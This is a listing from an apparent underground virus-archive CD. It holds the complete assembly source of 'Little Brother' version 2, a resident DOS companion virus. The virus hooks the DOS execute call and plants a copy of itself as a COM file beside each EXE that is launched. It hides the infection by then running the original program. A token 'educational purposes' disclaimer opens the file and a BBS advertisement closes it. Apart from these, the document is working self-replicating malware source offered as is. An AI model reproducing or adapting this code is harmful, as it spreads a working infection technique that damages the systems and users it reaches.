home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / b / brother2.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  8.9 KB  |  266 lines
  1. ;****************************************************************************
  2. ;*  Little Brother    version 2
  3. ;*
  4. ;*  Compile with MASM 4.0
  5. ;*  (other assemblers will probably not produce the same result)
  6. ;*
  7. ;*  Disclaimer:
  8. ;*  This file is only for educational purposes. The author takes no
  9. ;*  responsibility for anything anyone does with this file. Do not
  10. ;*  modify this file!
  11. ;****************************************************************************
  12.  
  13. cseg            segment
  14.                 assume  cs:cseg,ds:cseg,es:nothing
  15.  
  16.                 .RADIX  16
  17.  
  18. FILELEN         equ     end - begin
  19. RESPAR          equ     (FILELEN/16d) + 17d
  20. VERSION         equ     2
  21. oi21            equ     end
  22. nameptr         equ     end+4
  23. DTA             equ     end+8
  24.  
  25.  
  26. ;****************************************************************************
  27. ;*              Install the program!
  28. ;****************************************************************************
  29.  
  30.                 org     100h
  31.  
  32. begin:          cld
  33.  
  34.                 mov     ax,0044h                ;move program to empty hole
  35.                 mov     es,ax
  36.                 mov     di,0100h
  37.                 mov     si,di
  38.                 mov     cx,FILELEN
  39.         rep     movsb
  40.  
  41.                 mov     ds,cx                   ;get original int21 vector
  42.                 mov     si,0084h
  43.                 mov     di,offset oi21
  44.                 mov     dx,offset ni21
  45.                 lodsw
  46.                 cmp     ax,dx                   ;already installed?
  47.                 je      cancel
  48.                 stosw
  49.                 movsw
  50.  
  51.                 push    es                      ;set vector to new handler
  52.                 pop     ds
  53.                 mov     ax,2521h
  54.                 int     21h
  55.  
  56. cancel:         ret
  57.  
  58.  
  59. ;****************************************************************************
  60. ;*              File-extensions
  61. ;****************************************************************************
  62.  
  63. EXE_txt         db      'EXE',0
  64. COM_txt         db      'COM',0
  65.  
  66.  
  67. ;****************************************************************************
  68. ;*              Interupt handler 24
  69. ;****************************************************************************
  70.  
  71. ni24:           mov     al,03
  72.                 iret
  73.  
  74.  
  75. ;****************************************************************************
  76. ;*              Interupt handler 21
  77. ;****************************************************************************
  78.  
  79. ni21:           pushf
  80.                 push    dx
  81.                 push    bx
  82.                 push    ax
  83.                 push    ds
  84.                 push    es
  85.  
  86.                 cmp     ax,4B00h                ;execute ?
  87.                 jne     exit
  88.  
  89. doit:           call    infect
  90.  
  91. exit:           pop     es
  92.                 pop     ds
  93.                 pop     ax
  94.                 pop     bx
  95.                 pop     dx
  96.                 popf
  97.  
  98.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler
  99.  
  100.  
  101. ;****************************************************************************
  102. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  103. ;****************************************************************************
  104.  
  105. infect:         cld
  106.  
  107.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  108.                 mov     word ptr cs:[nameptr+2],ds
  109.  
  110.                 mov     ah,2Fh                  ;get old DTA
  111.                 int     21
  112.                 push    es
  113.                 push    bx
  114.  
  115.                 push    cs                      ;set new DTA
  116.                 pop     ds
  117.                 mov     dx,offset DTA
  118.                 mov     ah,1Ah
  119.                 int     21
  120.  
  121.                 call    searchpoint
  122.                 push    di
  123.                 mov     si,offset COM_txt       ;is extension 'COM'?
  124.                 mov     cx,3
  125.         rep     cmpsb
  126.                 pop     di
  127.                 jz      do_com
  128.  
  129.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  130.                 mov     cl,3
  131.         rep     cmpsb
  132.                 jnz     return
  133.  
  134. do_exe:         mov     si,offset COM_txt       ;change extension to COM
  135.                 call    change_ext
  136.  
  137.                 mov     ax,3300h                ;get ctrl-break flag
  138.                 int     21
  139.                 push    dx
  140.  
  141.                 cwd                             ;clear the flag
  142.                 inc     ax
  143.                 push    ax
  144.                 int     21
  145.  
  146.                 mov     ax,3524h                ;get int24 vector
  147.                 int     21
  148.                 push    bx
  149.                 push    es
  150.  
  151.                 push    cs                      ;set int24 vec to new handler
  152.                 pop     ds
  153.                 mov     dx,offset ni24
  154.                 mov     ah,25h
  155.                 push    ax
  156.                 int     21
  157.  
  158.                 lds     dx,dword ptr [nameptr]  ;create the virus (unique name)
  159.                 xor     cx,cx
  160.                 mov     ah,5Bh
  161.                 int     21
  162.                 jc      return1                 
  163.                 xchg    bx,ax                   ;save handle
  164.  
  165.                 push    cs
  166.                 pop     ds
  167.                 mov     cx,FILELEN              ;write the virus
  168.                 mov     dx,offset begin
  169.                 mov     ah,40h
  170.                 int     21
  171.                 cmp     ax,cx
  172.                 pushf
  173.  
  174.                 mov     ah,3Eh                  ;close the file
  175.                 int     21
  176.  
  177.                 popf
  178.                 jz      return1                 ;all bytes written?
  179.  
  180.                 lds     dx,dword ptr [nameptr]  ;no, delete the virus
  181.                 mov     ah,41h
  182.                 int     21
  183.  
  184. return1:        pop     ax                      ;restore int24 vector
  185.                 pop     ds
  186.                 pop     dx
  187.                 int     21
  188.  
  189.                 pop     ax                      ;restore ctrl-break flag
  190.                 pop     dx
  191.                 int     21
  192.  
  193.                 mov     si,offset EXE_txt       ;change extension to EXE
  194.                 call    change_ext              ;execute EXE-file
  195.  
  196. return:         mov     ah,1Ah                  ;restore old DTA
  197.                 pop     dx
  198.                 pop     ds
  199.                 int     21
  200.  
  201.                 ret
  202.  
  203. do_com:         call    findfirst               ;is the COM-file a virus?
  204.                 cmp     word ptr cs:[DTA+1Ah],FILELEN
  205.                 jne     return                  ;no, execute COM-file
  206.                 mov     si,offset EXE_txt       ;does the EXE-variant exist?
  207.                 call    change_ext
  208.                 call    findfirst
  209.                 jnc     return                  ;yes, execute EXE-file
  210.                 mov     si,offset COM_txt       ;change extension to COM
  211.                 call    change_ext
  212.                 jmp     short return            ;execute COM-file
  213.  
  214.  
  215. ;****************************************************************************
  216. ;*              Find the file
  217. ;****************************************************************************
  218.  
  219. findfirst:      lds     dx,dword ptr [nameptr]
  220.                 mov     cl,27h
  221.                 mov     ah,4Eh
  222.                 int     21
  223.                 ret                
  224.  
  225.  
  226. ;****************************************************************************
  227. ;*              change the extension of the filename (CS:SI -> ext)
  228. ;****************************************************************************
  229.  
  230. change_ext:     call    searchpoint
  231.                 push    cs
  232.                 pop     ds
  233.                 movsw
  234.                 movsw
  235.                 ret
  236.  
  237.  
  238. ;****************************************************************************
  239. ;*              search begin of extension  
  240. ;****************************************************************************
  241.  
  242. searchpoint:    les     di,dword ptr cs:[nameptr]
  243.                 mov     ch,0FFh
  244.                 mov     al,0
  245.         repnz   scasb
  246.                 sub     di,4
  247.                 ret
  248.  
  249.  
  250. ;****************************************************************************
  251. ;*              Text and Signature
  252. ;****************************************************************************
  253.  
  254.                 db      'Little Brother',0
  255.  
  256. end:
  257.  
  258. cseg            ends
  259.                 end     begin
  260. 
  261. ;  ─────────────────────────────────────────────────────────────────────────
  262. ;  ────────────────────> and Remember Don't Forget to Call <────────────────
  263. ;  ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
  264. ;  ─────────────────────────────────────────────────────────────────────────
  265.  
  266.